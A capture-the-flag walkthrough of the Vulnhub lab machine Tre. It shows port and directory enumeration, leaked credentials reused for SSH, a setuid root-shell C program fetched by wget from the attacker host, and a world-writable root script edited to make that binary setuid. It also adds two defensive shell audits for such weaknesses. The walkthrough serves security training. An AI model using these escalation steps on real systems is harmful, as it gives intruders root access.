         __    _____        _____     _____ _ _____
        |  |  |  _  |   ___|  _  |___|  |  |_|_   _|___
        |  |__|     |  |  _|     |_ -|     | | | | | .'| 
        |_____|__|__|  |___|__|__|___|__|__|_| |_| |__,|
			hola@lacashita.com

 
 

[VLN] Tre

Today we are going to hack the Vulnhub machine called Tre. You can download it from the following link: https://www.vulnhub.com/entry/tre-1,483/
  • Enumeration
  • We start with an nmap scan to see which ports are open.
    sml@m0nique:~$ nmap -A -p- 192.168.112.130
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-18 12:40 CEST
    Nmap scan report for 192.168.112.130
    Host is up (0.0010s latency).
    Not shown: 65532 closed ports
    PORT     STATE SERVICE VERSION
    22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
    | ssh-hostkey:
    |   2048 99:1a:ea:d7:d7:b3:48:80:9f:88:82:2a:14:eb:5f:0e (RSA)
    |   256 f4:f6:9c:db:cf:d4:df:6a:91:0a:81:05:de:fa:8d:f8 (ECDSA)
    |_  256 ed:b9:a9:d7:2d:00:f8:1b:d3:99:d6:02:e5:ad:17:9f (ED25519)
    80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
    |_http-server-header: Apache/2.4.38 (Debian)
    |_http-title: Tre
    8082/tcp open  http    nginx 1.14.2
    |_http-server-header: nginx/1.14.2
    |_http-title: Tre
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 23.16 seconds
    We take a look at Apache (port 80).
    sml@m0nique:~$ gobuster dir -u http://192.168.112.130 -w /usr/share/wordlists/dirb/big.txt -x php,html,htm,txt
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            http://192.168.112.130
    [+] Threads:        10
    [+] Wordlist:       /usr/share/wordlists/dirb/big.txt
    [+] Status codes:   200,204,301,302,307,401,403
    [+] User Agent:     gobuster/3.0.1
    [+] Extensions:     php,html,htm,txt
    [+] Timeout:        10s
    ===============================================================
    2020/05/18 12:42:09 Starting gobuster
    ===============================================================
    /.htpasswd (Status: 403)
    /.htpasswd.php (Status: 403)
    /.htpasswd.html (Status: 403)
    /.htpasswd.htm (Status: 403)
    /.htpasswd.txt (Status: 403)
    /.htaccess (Status: 403)
    /.htaccess.htm (Status: 403)
    /.htaccess.txt (Status: 403)
    /.htaccess.php (Status: 403)
    /.htaccess.html (Status: 403)
    /adminer.php (Status: 200)
    /cms (Status: 301)
    /index.html (Status: 200)
    /info.php (Status: 200)
    /mantisbt (Status: 301)
    /server-status (Status: 403)
    /system (Status: 401)
    ===============================================================
    2020/05/18 12:42:19 Finished
    ===============================================================
    We see the /mantisbt folder, so let's dig a bit deeper...
    sml@m0nique:~$ gobuster dir -u http://192.168.112.130/mantisbt/ -w /usr/share/wordlists/dirb/big.txt -x php,html,htm,txt
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            http://192.168.112.130/mantisbt/
    [+] Threads:        10
    [+] Wordlist:       /usr/share/wordlists/dirb/big.txt
    [+] Status codes:   200,204,301,302,307,401,403
    [+] User Agent:     gobuster/3.0.1
    [+] Extensions:     php,html,htm,txt
    [+] Timeout:        10s
    ===============================================================
    2020/05/18 12:47:24 Starting gobuster
    ===============================================================
    /.htpasswd (Status: 403)
    /.htpasswd.php (Status: 403)
    /.htpasswd.html (Status: 403)
    /.htpasswd.htm (Status: 403)
    /.htpasswd.txt (Status: 403)
    /.htaccess (Status: 403)
    /.htaccess.php (Status: 403)
    /.htaccess.html (Status: 403)
    /.htaccess.htm (Status: 403)
    /.htaccess.txt (Status: 403)
    /admin (Status: 301)
    /api (Status: 301)
    /bug_report.php (Status: 200)
    /config (Status: 301)
    /css (Status: 301)
    /core (Status: 301)
    /core.php (Status: 200)
    /doc (Status: 301)
    /file_download.php (Status: 302)
    /fonts (Status: 301)
    /images (Status: 301)
    /index.php (Status: 302)
    /js (Status: 301)
    /lang (Status: 301)
    /library (Status: 301)
    /login.php (Status: 302)
    /main_page.php (Status: 302)
    /plugins (Status: 301)
    /plugin.php (Status: 200)
    /scripts (Status: 301)
    /search.php (Status: 302)
    /signup.php (Status: 200)
    /vendor (Status: 301)
    /view.php (Status: 200)
    /verify.php (Status: 200)
    /wiki.php (Status: 200)
    ===============================================================
    2020/05/18 12:47:35 Finished
    ===============================================================
    At http://192.168.112.130/mantisbt/config/a.txt we can find some credentials that we can use at http://192.168.112.130/adminer.php. We log in to "adminer.php" with those credentials and go to "select mantis_user_table", then to "select data". There we will find usernames/passwords.
  • Low Shell
  • We try to connect via ssh as user tre with the password we found (Tr3@123456A!).
    sml@m0nique:~$ ssh tre@192.168.112.130
    tre@192.168.112.130's password:
    Linux tre 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64

    The programs included with the Debian GNU/Linux system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.

    Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
    permitted by applicable law.
    Last login: Mon May 18 14:39:58 2020 from 192.168.112.128
    tre@tre:~$
    We're in :) Let's see whether there is anything special we can run with sudo.
    tre@tre:/tmp$ sudo -l
    Matching Defaults entries for tre on tre:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

    User tre may run the following commands on tre:
        (ALL) NOPASSWD: /sbin/shutdown
    We can run shutdown.... On the other hand, looking at the processes, we see one that stands out.
    tre@tre:~$ ps aux | grep check
    root       391  0.0  0.1   6728  3288 ?        Ss   06:38   0:02 /bin/bash /usr/bin/check-system
    tre      35106  0.0  0.0   6208   892 pts/1    S+   08:03   0:00 grep check
    tre@tre:~$ ls -l /usr/bin/check-system
    -rw----rw- 1 root root 135 May 12 04:08 /usr/bin/check-system
    So /bin/bash /usr/bin/check-system runs as root, and the file is world-writable (the trailing "rw-" in -rw----rw-), which means we, as user tre, can read and modify it. Let's take a look at the file:
    tre@tre:~$ cat /usr/bin/check-system
    DATE=`date '+%Y-%m-%d %H:%M:%S'`
    echo "Service started at ${DATE}" | systemd-cat -p info
    while :
    do
        echo "Checking..."; sleep 1;
    done
    We see it's a fairly simple script.
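    The weak spot here is a script that a root process executes but that every user can write to. As an added check from the defender's side (this is not part of the original writeup and not a tool from the Tre machine), the POSIX shell snippet below walks the root-owned processes in /proc, picks out every absolute path on their command line (interpreter and script alike, so "/bin/bash /usr/bin/check-system" yields both) and reports the ones that are world-writable. audit_files takes explicit paths so the logic can be exercised offline; the function names and the --live flag are this example's own.

```shell
#!/bin/sh
# Added example, not part of the original writeup: find files that are used by
# root processes but are writable by everyone (the /usr/bin/check-system case).

# Return 0 when the file's "other" write bit is set, 1 otherwise.
# The ninth character of the ls mode string (e.g. -rw----rw-) is that bit.
is_world_writable() {
    f="$1"
    [ -e "$f" ] || return 1
    [ "$(ls -ld "$f" | cut -c9)" = "w" ]
}

# audit_files PATH...: print a warning for each world-writable path.
# Returns 0 when nothing was flagged, 1 when at least one path was.
audit_files() {
    flagged=0
    for f in "$@"; do
        if is_world_writable "$f"; then
            echo "WARNING: world-writable file used by root: $f"
            flagged=1
        fi
    done
    return "$flagged"
}

# root_process_paths: every absolute path on the command line of a process
# whose real uid is 0, one per line. Needs a readable Linux /proc.
root_process_paths() {
    for p in /proc/[0-9]*; do
        [ -r "$p/status" ] || continue
        # "Uid:" line of /proc/PID/status: real uid is the first number
        uid=$(awk '/^Uid:/ { print $2 }' "$p/status" 2>/dev/null)
        [ "$uid" = "0" ] || continue
        # cmdline is NUL-separated; keep only arguments that look like paths
        tr '\0' '\n' < "$p/cmdline" 2>/dev/null | grep '^/' || :
    done | sort -u
}

# audit_root_processes: audit_files over everything root_process_paths found.
audit_root_processes() {
    paths=$(root_process_paths)
    [ -n "$paths" ] || return 0
    # split the list on newlines only, without glob expansion
    old_ifs=$IFS
    IFS='
'
    set -f
    set -- $paths
    set +f
    IFS=$old_ifs
    audit_files "$@"
}

# Live scan only when explicitly asked for (sh audit.sh --live), so that the
# functions can also be sourced or tested without touching /proc.
[ "${1:-}" = "--live" ] && audit_root_processes
```

    Run as root so that every /proc/PID/status is readable; the exit status is 1 when something was flagged, which makes it easy to hook into a cron job or a CI check of a golden image. The same ls-based test can be pointed at files that are referenced indirectly, such as systemd unit ExecStart targets, once you have collected them.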
  • Privilege Escalation
  • Knowing this, on our machine we compile a root shell, which we will then download onto the victim machine. The root shell code is the following:
    sml@m0nique:/var/www/html$ cat rootshell.c
    // gcc -o /tmp/rootshell /tmp/rootshell.c
    // chmod u+s /tmp/rootshell
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>

    int main(void) {
        /* with the setuid bit set and root as owner, these make us uid/gid 0 */
        setuid(0);
        setgid(0);
        system("/bin/bash");
        return 0;
    }
    We compile it:
    root@m0nique:/var/www/html# gcc -o rootshell rootshell.c
    We start the web server to make the "rootshell" binary reachable and download it onto the "victim" machine, in this case to /home/tre/rootshell.
    tre@tre:~$ wget http://192.168.112.128/rootshell
    --2020-05-18 14:38:37--  http://192.168.112.128/rootshell
    Connecting to 192.168.112.128:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 16712 (16K) [application/octet-stream]
    Saving to: ‘rootshell’

    rootshell           100%[=======================>]  16.32K  --.-KB/s    in 0s

    2020-05-18 14:38:37 (422 MB/s) - ‘rootshell’ saved [16712/16712]
    We edit the file "/usr/bin/check-system" and add the lines needed so that rootshell is owned by root, executable by "tre" and SUID; that way, when we run it, we become root...
    tre@tre:~$ nano /usr/bin/check-system
    It ends up like this:
    tre@tre:~$ cat /usr/bin/check-system
    DATE=`date '+%Y-%m-%d %H:%M:%S'`
    echo "Service started at ${DATE}" | systemd-cat -p info
    chown root:tre /home/tre/rootshell
    chmod +x /home/tre/rootshell
    chmod +s /home/tre/rootshell
    while :
    do
        echo "Checking..."; sleep 1;
    done
    We reboot the machine so that /usr/bin/check-system runs with the changes we made.
    tre@tre:~$ sudo shutdown -r now
    We connect again and check:
    sml@m0nique:~$ ssh tre@192.168.112.130
    tre@192.168.112.130's password:
    Linux tre 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64

    The programs included with the Debian GNU/Linux system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.

    Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
    permitted by applicable law.
    Last login: Mon May 18 14:36:31 2020 from 192.168.112.128
    tre@tre:~$ ls -l
    total 20
    -rwsr-sr-x 1 root tre 16712 May 18 14:38 rootshell
    It is exactly as we needed it, so...
    tre@tre:~$ ./rootshell
    root@tre:~# id
    uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(tre)
    root@tre:~# whoami
    root
    root@tre:~# hostname
    tre
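    From the defender's seat, what the reboot left behind is a brand-new setuid-root file inside a home directory, something no Debian package installs. As an added example (not part of the writeup and not something that ships with the machine), the POSIX shell snippet below records a baseline of setuid/setgid files and, on a later run, reports the ones that appeared since, plus any that live outside the directories packages normally install into. The function names, the baseline path /var/lib/suid-baseline.txt and the "rootshell" name used in the test are this example's own choices.

```shell
#!/bin/sh
# Added example, not part of the original writeup: detect setuid/setgid files
# that were not there before (such as /home/tre/rootshell after the reboot).

# list_suid DIR: setuid or setgid regular files under DIR, sorted, one per line.
# -xdev keeps the walk on one filesystem so /proc, /sys and mounts are skipped.
list_suid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# save_suid_baseline DIR FILE: record the current set for later comparison.
save_suid_baseline() {
    list_suid "$1" > "$2"
}

# new_suid_files DIR BASELINE: print entries present now but absent from
# BASELINE. Returns 0 when nothing new appeared, 1 otherwise.
new_suid_files() {
    [ -r "$2" ] || { echo "no readable baseline: $2" >&2; return 1; }
    new=$(list_suid "$1" | comm -13 "$2" -)
    [ -z "$new" ] && return 0
    printf '%s\n' "$new"
    return 1
}

# suid_outside_system_dirs DIR: setuid/setgid files outside the directories
# packages install into. A setuid binary in a home directory, /tmp or /var/tmp
# deserves a look even when it matches the baseline. Returns 0 when the list
# is empty, 1 otherwise.
suid_outside_system_dirs() {
    odd=$(list_suid "$1" | grep -Ev '^/(usr|bin|sbin|lib|lib32|lib64|opt)/')
    [ -z "$odd" ] && return 0
    printf '%s\n' "$odd"
    return 1
}

# Typical use on a host, run as root so that every directory is readable:
#   sh suid-audit.sh baseline   -> writes /var/lib/suid-baseline.txt
#   sh suid-audit.sh check      -> reports new files and odd locations
case "${1:-}" in
    baseline) save_suid_baseline / /var/lib/suid-baseline.txt ;;
    check)    new_suid_files / /var/lib/suid-baseline.txt
              suid_outside_system_dirs / ;;
esac
```

    Take the baseline right after installation or after a package upgrade, store it somewhere the audited users cannot write to, and run the check from cron or your configuration-management tool; a non-zero exit status is the signal. On the Tre box the check run would print /home/tre/rootshell twice, once as new and once as an odd location.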
  • root.txt
    root@tre:~# cd /root
    root@tre:/root# ls
    root.txt
    root@tre:/root# cat root.txt
    {SunCSR_Tr3_Viet_Nam_2020}
    root@tre:/root#
  • End
  • And with that we are root on the machine :)